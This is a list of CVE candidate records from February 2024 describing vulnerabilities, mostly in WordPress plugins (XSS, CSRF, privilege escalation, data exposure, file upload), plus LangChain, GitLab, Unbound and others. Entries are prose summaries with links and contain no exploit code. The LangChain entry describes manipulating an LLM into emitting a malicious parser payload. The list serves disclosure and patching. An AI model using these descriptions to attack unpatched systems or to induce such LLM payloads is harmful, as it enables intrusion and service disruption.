CVE 2024 1505 Candidate The Academy LMS – eLearning and online course solution for WordPress plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.9.19. This is due to plugin allowing arbitrary user meta updates through the saved_user_info() function. This makes it possible for authenticated attackers, with minimal permissions such as students, to elevate their user role to that of an administrator. MISC:https://plugins.trac.wordpress.org/changeset/3037880/academy#file473 | URL:https://plugins.trac.wordpress.org/changeset/3037880/academy#file473 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b150f90a-ccb7-4c19-a4b3-eaf9ec264ba8?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b150f90a-ccb7-4c19-a4b3-eaf9ec264ba8?source=cve Assigned (20240214)
CVE 2024 1503 Candidate The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.1. This is due to missing or incorrect nonce validation on the erase_tutor_data() function. This makes it possible for unauthenticated attackers to deactivate the plugin and erase all data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This requires the "Erase upon uninstallation" option to be enabled. MISC:https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Admin.php#L465 | URL:https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Admin.php#L465 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/050647a8-6743-46e4-b31c-0b5bd4a1007f?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/050647a8-6743-46e4-b31c-0b5bd4a1007f?source=cve Assigned (20240214)
CVE 2024 1502 Candidate The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the tutor_delete_announcement() function in all versions up to, and including, 2.6.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary posts. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049105%40tutor&new=3049105%40tutor&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049105%40tutor&new=3049105%40tutor&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/834c4ca9-7173-4c84-8287-9916ec72935d?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/834c4ca9-7173-4c84-8287-9916ec72935d?source=cve Assigned (20240214)
CVE 2024 1501 Candidate The Database Reset plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.22. This is due to missing or incorrect nonce validation on the install_wpr() function. This makes it possible for unauthenticated attackers to install the WP Reset Plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/wordpress-database-reset/trunk/class-db-reset-admin.php#L127 | URL:https://plugins.trac.wordpress.org/browser/wordpress-database-reset/trunk/class-db-reset-admin.php#L127 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037742%40wordpress-database-reset&new=3037742%40wordpress-database-reset&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037742%40wordpress-database-reset&new=3037742%40wordpress-database-reset&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a2e493cf-d022-404d-a501-a6671e6116f4?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a2e493cf-d022-404d-a501-a6671e6116f4?source=cve Assigned (20240214)
CVE 2024 1500 Candidate The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Logo Widget in all versions up to, and including, 1.3.91 due to insufficient input sanitization and output escaping on user supplied URLs. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/logo/widgets/wpr-logo.php#L644 | URL:https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/logo/widgets/wpr-logo.php#L644 | MISC:https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/logo/widgets/wpr-logo.php#L664 | URL:https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/logo/widgets/wpr-logo.php#L664 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037411%40royal-elementor-addons%2Ftags%2F1.3.91&new=3038353%40royal-elementor-addons%2Ftags%2F1.3.92 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037411%40royal-elementor-addons%2Ftags%2F1.3.91&new=3038353%40royal-elementor-addons%2Ftags%2F1.3.92 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8619c999-5cf7-4888-bdb2-815238411303?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8619c999-5cf7-4888-bdb2-815238411303?source=cve Assigned (20240214)
CVE 2024 1499 Candidate The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Pricing Table widget in the $settings['title_tags'] parameter in all versions up to, and including, 2.10.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/themeisle-companion/tags/2.10.30/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1037 | URL:https://plugins.trac.wordpress.org/browser/themeisle-companion/tags/2.10.30/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1037 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3038451%40themeisle-companion%2Ftrunk&old=3030173%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=#file10 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3038451%40themeisle-companion%2Ftrunk&old=3030173%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=#file10 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/df40eb21-2080-4de5-9055-09246a8a275e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/df40eb21-2080-4de5-9055-09246a8a275e?source=cve Assigned (20240214)
CVE 2024 1497 Candidate The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form widget addr2_width attribute in all versions up to, and including, 2.10.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/themeisle-companion/tags/2.10.30/vendor/codeinwp/themeisle-content-forms/includes/widgets-admin/elementor/elementor_widget_base.php#L1219 | URL:https://plugins.trac.wordpress.org/browser/themeisle-companion/tags/2.10.30/vendor/codeinwp/themeisle-content-forms/includes/widgets-admin/elementor/elementor_widget_base.php#L1219 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3038451%40themeisle-companion%2Ftrunk&old=3030173%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=#file10 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3038451%40themeisle-companion%2Ftrunk&old=3030173%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=#file10 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b4603b58-0972-4e04-91ac-ffc846964722?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b4603b58-0972-4e04-91ac-ffc846964722?source=cve Assigned (20240214)
CVE 2024 1496 Candidate The Featured Image from URL (FIFU) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the fifu_input_url parameter in all versions up to, and including, 4.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/featured-image-from-url/tags/4.6.2/elementor/widgets/widget.php#L49 | URL:https://plugins.trac.wordpress.org/browser/featured-image-from-url/tags/4.6.2/elementor/widgets/widget.php#L49 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037479%40featured-image-from-url%2Ftrunk&old=3034300%40featured-image-from-url%2Ftrunk&sfp_email=&sfph_mail=#file9 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037479%40featured-image-from-url%2Ftrunk&old=3034300%40featured-image-from-url%2Ftrunk&sfp_email=&sfph_mail=#file9 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7d1ea1c5-6a9e-4b77-bfdf-62e50d4a4c03?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7d1ea1c5-6a9e-4b77-bfdf-62e50d4a4c03?source=cve Assigned (20240214)
CVE 2024 1492 Candidate The WPify Woo Czech plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the maybe_send_to_packeta function in all versions up to, and including, 4.0.8. This makes it possible for unauthenticated attackers to obtain shipping details for orders as long as the order number is known. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037482%40wpify-woo%2Ftrunk&old=3028980%40wpify-woo%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037482%40wpify-woo%2Ftrunk&old=3028980%40wpify-woo%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/44f691f2-b3f4-49b7-8710-015b5b11db18?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/44f691f2-b3f4-49b7-8710-015b5b11db18?source=cve Assigned (20240214)
CVE 2024 1489 Candidate The SMS Alert Order Notifications – WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.9. This is due to missing or incorrect nonce validation on the processBulkAction function. This makes it possible for unauthenticated attackers to delete pages and posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3039989%40sms-alert%2Ftrunk&old=3032487%40sms-alert%2Ftrunk&sfp_email=&sfph_mail=#file19 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3039989%40sms-alert%2Ftrunk&old=3032487%40sms-alert%2Ftrunk&sfp_email=&sfph_mail=#file19 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e7a28382-facb-43a7-892a-8ca9e7f0f62b?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e7a28382-facb-43a7-892a-8ca9e7f0f62b?source=cve Assigned (20240214)
CVE 2024 1488 Candidate A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether. MISC:RHBZ#2264183 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264183 | MISC:https://access.redhat.com/security/cve/CVE-2024-1488 | URL:https://access.redhat.com/security/cve/CVE-2024-1488 Assigned (20240214)
CVE 2024 1487 Candidate The Photos and Files Contest Gallery WordPress plugin before 21.3.1 does not sanitize and escape some parameters, which could allow users with a role as low as author to perform Cross-Site Scripting attacks. MISC:https://wpscan.com/vulnerability/c028cd73-f30a-4c8b-870f-3071055f0496/ | URL:https://wpscan.com/vulnerability/c028cd73-f30a-4c8b-870f-3071055f0496/ Assigned (20240214)
CVE 2024 1485 Candidate A flaw was found in the decompression function of registry-support. This issue can be triggered if an unauthenticated remote attacker tricks a user into parsing a devfile which uses the `parent` or `plugin` keywords. This could download a malicious archive and cause the cleanup process to overwrite or delete files outside of the archive, which should not be allowed. MISC:RHBZ#2264106 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264106 | MISC:https://access.redhat.com/security/cve/CVE-2024-1485 | URL:https://access.redhat.com/security/cve/CVE-2024-1485 | MISC:https://github.com/advisories/GHSA-84xv-jfrm-h4gm | URL:https://github.com/advisories/GHSA-84xv-jfrm-h4gm | MISC:https://github.com/devfile/registry-support/commit/0e44b9ca6d03fac4fc3f77d37656d56dc5defe0d | URL:https://github.com/devfile/registry-support/commit/0e44b9ca6d03fac4fc3f77d37656d56dc5defe0d | MISC:https://github.com/devfile/registry-support/pull/197 | URL:https://github.com/devfile/registry-support/pull/197 Assigned (20240213)
CVE 2024 1484 Candidate The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the date parameters in all versions up to, and including, 1.0.98 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041769%40ameliabooking%2Ftrunk&old=3037721%40ameliabooking%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041769%40ameliabooking%2Ftrunk&old=3037721%40ameliabooking%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3a849ef2-ad0a-45ea-8827-9a7233b1ca30?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3a849ef2-ad0a-45ea-8827-9a7233b1ca30?source=cve Assigned (20240213)
CVE 2024 1482 Candidate An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed an attacker to create new branches in public repositories and run arbitrary GitHub Actions workflows with permissions from the GITHUB_TOKEN. To exploit this vulnerability, an attacker would need access to the Enterprise Server. This vulnerability affected all versions of GitHub Enterprise Server after 3.8 and prior to 3.12, and was fixed in versions 3.9.10, 3.10.7, 3.11.5. This vulnerability was reported via the GitHub Bug Bounty program. MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 | URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 Assigned (20240213)
CVE 2024 1479 Candidate The WP Show Posts plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.4 via the wpsp_display function. This makes it possible for authenticated attackers with contributor access and above to view the contents of draft, trash, future, private and pending posts and pages. MISC:https://plugins.trac.wordpress.org/browser/wp-show-posts/trunk/wp-show-posts.php#L224 | URL:https://plugins.trac.wordpress.org/browser/wp-show-posts/trunk/wp-show-posts.php#L224 | MISC:https://plugins.trac.wordpress.org/browser/wp-show-posts/trunk/wp-show-posts.php#L591 | URL:https://plugins.trac.wordpress.org/browser/wp-show-posts/trunk/wp-show-posts.php#L591 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041416%40wp-show-posts%2Ftrunk&old=2846296%40wp-show-posts%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041416%40wp-show-posts%2Ftrunk&old=2846296%40wp-show-posts%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6788e2ee-ce61-494b-8d7f-6d1144466e58?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6788e2ee-ce61-494b-8d7f-6d1144466e58?source=cve Assigned (20240213)
CVE 2024 1478 Candidate The Maintenance Mode plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.0 via the REST API. This makes it possible for unauthenticated attackers to obtain post and page content via API thus bypassing the content protection provided by the plugin. MISC:https://wordpress.org/plugins/hkdev-maintenance-mode/ | URL:https://wordpress.org/plugins/hkdev-maintenance-mode/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/36def628-e09e-4da0-ab14-35aefcb67f73?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/36def628-e09e-4da0-ab14-35aefcb67f73?source=cve Assigned (20240213)
CVE 2024 1477 Candidate The Easy Maintenance Mode plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.2 via the REST API. This makes it possible for authenticated attackers to obtain post and page content via REST API thus bypassign the protection provided by the plugin. MISC:https://wordpress.org/plugins/easy-maintenance-mode-coming-soon/ | URL:https://wordpress.org/plugins/easy-maintenance-mode-coming-soon/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1a12f472-0ae1-4c3c-b7e3-85f637fe58c5?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1a12f472-0ae1-4c3c-b7e3-85f637fe58c5?source=cve Assigned (20240213)
CVE 2024 1476 Candidate The Under Construction / Maintenance Mode from Acurax plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6 via the REST API. This makes it possible for unauthenticated attackers to obtain the contents of posts and pages when maintenance mode is active thus bypassing the protection provided by the plugin. MISC:https://wordpress.org/plugins/coming-soon-maintenance-mode-from-acurax/ | URL:https://wordpress.org/plugins/coming-soon-maintenance-mode-from-acurax/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f28c47e6-a37d-4328-afb2-6a9e6b3fe20a?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f28c47e6-a37d-4328-afb2-6a9e6b3fe20a?source=cve Assigned (20240213)
CVE 2024 1475 Candidate The Coming Soon Maintenance Mode plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.5 via the REST API. This makes it possible for unauthenticated attackers to obtain post and page content thus bypassing the protection provided by the plugin. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037910%40coming-soon-maintenance-mode%2Ftrunk&old=3031487%40coming-soon-maintenance-mode%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037910%40coming-soon-maintenance-mode%2Ftrunk&old=3031487%40coming-soon-maintenance-mode%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/44e4a1a3-71d0-4cad-9807-f6bbc99ccb13?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/44e4a1a3-71d0-4cad-9807-f6bbc99ccb13?source=cve Assigned (20240213)
CVE 2024 1474 Candidate In WS_FTP Server versions before 8.8.5, reflected cross-site scripting issues have been identified on various user supplied inputs on the WS_FTP Server administrative interface. MISC:https://community.progress.com/s/article/WS-FTP-Server-Service-Pack-February-2024 | URL:https://community.progress.com/s/article/WS-FTP-Server-Service-Pack-February-2024 | MISC:https://www.progress.com/ws_ftp | URL:https://www.progress.com/ws_ftp Assigned (20240213)
CVE 2024 1473 Candidate The Coming Soon & Maintenance Mode by Colorlib plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.99 via the REST API. This makes it possible for unauthenticated attackers to obtain post and page contents via REST API thus bypassing maintenance mode protection provided by the plugin. MISC:https://wordpress.org/plugins/colorlib-coming-soon-maintenance/ | URL:https://wordpress.org/plugins/colorlib-coming-soon-maintenance/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/48dc10a9-7bb9-401f-befd-1bf620858825?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/48dc10a9-7bb9-401f-befd-1bf620858825?source=cve Assigned (20240213)
CVE 2024 1472 Candidate The WP Maintenance plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 6.1.6 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's maintenance mode obtain post and page content via REST API. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035862%40wp-maintenance%2Ftrunk&old=3032356%40wp-maintenance%2Ftrunk&sfp_email=&sfph_mail=#file4 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035862%40wp-maintenance%2Ftrunk&old=3032356%40wp-maintenance%2Ftrunk&sfp_email=&sfph_mail=#file4 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/645328f3-2bcb-4287-952c-2e23ec57bb4e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/645328f3-2bcb-4287-952c-2e23ec57bb4e?source=cve Assigned (20240213)
CVE 2024 1471 Candidate An HTML injection vulnerability exists where an authenticated, remote attacker with administrator privileges on the Security Center application could modify Repository parameters, which could lead to HTML redirection attacks. MISC:https://www.tenable.com/security/tns-2024-02 | URL:https://www.tenable.com/security/tns-2024-02 Assigned (20240213)
CVE 2024 1470 Candidate Authorization Bypass Through User-Controlled Key vulnerability in NetIQ (OpenText) Client Login Extension on Windows allows Privilege Escalation, Code Injection.This issue only affects NetIQ Client Login Extension: 4.6. MISC:https://portal.microfocus.com/s/article/KM000026667?language=en_US | URL:https://portal.microfocus.com/s/article/KM000026667?language=en_US Assigned (20240213)
CVE 2024 1468 Candidate The Avada | Website Builder For WordPress & WooCommerce theme for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ajax_import_options() function in all versions up to, and including, 7.11.4. This makes it possible for authenticated attackers, with contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. MISC:https://avada.com/documentation/avada-changelog/ | URL:https://avada.com/documentation/avada-changelog/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cde6e758-9723-43f2-9972-32be8aeb2b91?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cde6e758-9723-43f2-9972-32be8aeb2b91?source=cve Assigned (20240213)
CVE 2024 1462 Candidate The Maintenance Page plugin for WordPress is vulnerable to Basic Information Exposure in all versions up to, and including, 1.0.8 via the REST API. This makes it possible for unauthenticated attackers to view post titles and content when the site is in maintenance mode. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037664%40maintenance-page%2Ftrunk&old=1218033%40maintenance-page%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037664%40maintenance-page%2Ftrunk&old=1218033%40maintenance-page%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/653bf021-370d-4787-9ded-c5c915aed1d6?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/653bf021-370d-4787-9ded-c5c915aed1d6?source=cve Assigned (20240212)
CVE 2024 1460 Candidate MSI Afterburner v4.6.5.16370 is vulnerable to a Kernel Memory Leak vulnerability by triggering the 0x80002040 IOCTL code of the RTCore64.sys driver. The handle to the driver can only be obtained from a high integrity process. MISC:https://fluidattacks.com/advisories/mingus/ | URL:https://fluidattacks.com/advisories/mingus/ | MISC:https://www.msi.com/Landing/afterburner/graphics-cards | URL:https://www.msi.com/Landing/afterburner/graphics-cards Assigned (20240212)
CVE 2024 1459 Candidate A path traversal vulnerability was found in Undertow. This issue may allow a remote attacker to append a specially-crafted sequence to an HTTP request for an application deployed to JBoss EAP, which may permit access to privileged or restricted files and directories. MISC:RHBZ#2259475 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2259475 | MISC:https://access.redhat.com/security/cve/CVE-2024-1459 | URL:https://access.redhat.com/security/cve/CVE-2024-1459 Assigned (20240212)
CVE 2024 1455 Candidate The XMLOutputParser in LangChain uses the etree module from the XML parser in the standard python library which has some XML vulnerabilities; see: https://docs.python.org/3/library/xml.html This primarily affects users that combine an LLM (or agent) with the `XMLOutputParser` and expose the component via an endpoint on a web-service. This would allow a malicious party to attempt to manipulate the LLM to produce a malicious payload for the parser that would compromise the availability of the service. A successful attack is predicated on: 1. Usage of XMLOutputParser 2. Passing of malicious input into the XMLOutputParser either directly or by trying to manipulate an LLM to do so on the users behalf 3. Exposing the component via a web-service MISC:https://huntr.com/bounties/4353571f-c70d-4bfd-ac08-3a89cecb45b6 | URL:https://huntr.com/bounties/4353571f-c70d-4bfd-ac08-3a89cecb45b6 Assigned (20240212)
CVE 2024 1454 Candidate The use-after-free vulnerability was found in the AuthentIC driver in OpenSC packages, occuring in the card enrolment process using pkcs15-init when a user or administrator enrols or modifies cards. An attacker must have physical access to the computer system and requires a crafted USB device or smart card to present the system with specially crafted responses to the APDUs, which are considered high complexity and low severity. This manipulation can allow for compromised card management operations during enrolment. FEDORA:FEDORA-2024-3dbc3e8105 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UECKC7X4IM4YZQ5KRQMNBNKNOXLZC7RZ/ | FEDORA:FEDORA-2024-6460a03e29 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RJI2FWLY24EOPALQ43YPQEZMEP3APPPI/ | FEDORA:FEDORA-2024-b92d44f141 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OWIZ5ZLO5ECYPLSTESCF7I7PQO5X6ZSU/ | MISC:RHBZ#2263929 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2263929 | MISC:https://access.redhat.com/security/cve/CVE-2024-1454 | URL:https://access.redhat.com/security/cve/CVE-2024-1454 | MISC:https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=64898 | URL:https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=64898 | MISC:https://github.com/OpenSC/OpenSC/commit/5835f0d4f6c033bd58806d33fa546908d39825c9 | URL:https://github.com/OpenSC/OpenSC/commit/5835f0d4f6c033bd58806d33fa546908d39825c9 Assigned (20240212)
CVE 2024 1453 Candidate In Sante DICOM Viewer Pro versions 14.0.3 and prior, a user must open a malicious DICOM file, which could allow a local attacker to disclose information or execute arbitrary code. MISC:https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-058-01 | URL:https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-058-01 Assigned (20240212)
CVE 2024 1452 Candidate The GenerateBlocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.2 via Query Loop. This makes it possible for authenticated attackers, with contributor access and above, to see contents of posts and pages in draft or private status as well as those with scheduled publication dates. MISC:https://plugins.trac.wordpress.org/browser/generateblocks/trunk/includes/class-query-loop.php#L140 | URL:https://plugins.trac.wordpress.org/browser/generateblocks/trunk/includes/class-query-loop.php#L140 | MISC:https://plugins.trac.wordpress.org/browser/generateblocks/trunk/includes/class-query-loop.php#L70 | URL:https://plugins.trac.wordpress.org/browser/generateblocks/trunk/includes/class-query-loop.php#L70 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041431%40generateblocks%2Ftrunk&old=2995923%40generateblocks%2Ftrunk&sfp_email=&sfph_mail=#file2 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041431%40generateblocks%2Ftrunk&old=2995923%40generateblocks%2Ftrunk&sfp_email=&sfph_mail=#file2 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/62f19301-2311-4989-a5f2-9f845b72dd54?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/62f19301-2311-4989-a5f2-9f845b72dd54?source=cve Assigned (20240212)
CVE 2024 1451 Candidate An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.9 before 16.9.1. A crafted payload added to the user profile page could lead to a stored XSS on the client side, allowing attackers to perform arbitrary actions on behalf of victims." MISC:GitLab Issue #441457 | URL:https://gitlab.com/gitlab-org/gitlab/-/issues/441457 | MISC:HackerOne Bug Bounty Report #2371126 | URL:https://hackerone.com/reports/2371126 Assigned (20240212)
CVE 2024 1450 Candidate The Shariff Wrapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shariff' shortcode in all versions up to, and including, 4.6.10 due to insufficient input sanitization and output escaping on user supplied attributes such as 'align'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/shariff/tags/4.6.10/shariff.php | URL:https://plugins.trac.wordpress.org/browser/shariff/tags/4.6.10/shariff.php | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047668%40shariff&new=3047668%40shariff&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047668%40shariff&new=3047668%40shariff&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/00a3d8e3-17b1-488b-9c42-2479932c9bf7?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/00a3d8e3-17b1-488b-9c42-2479932c9bf7?source=cve Assigned (20240212)
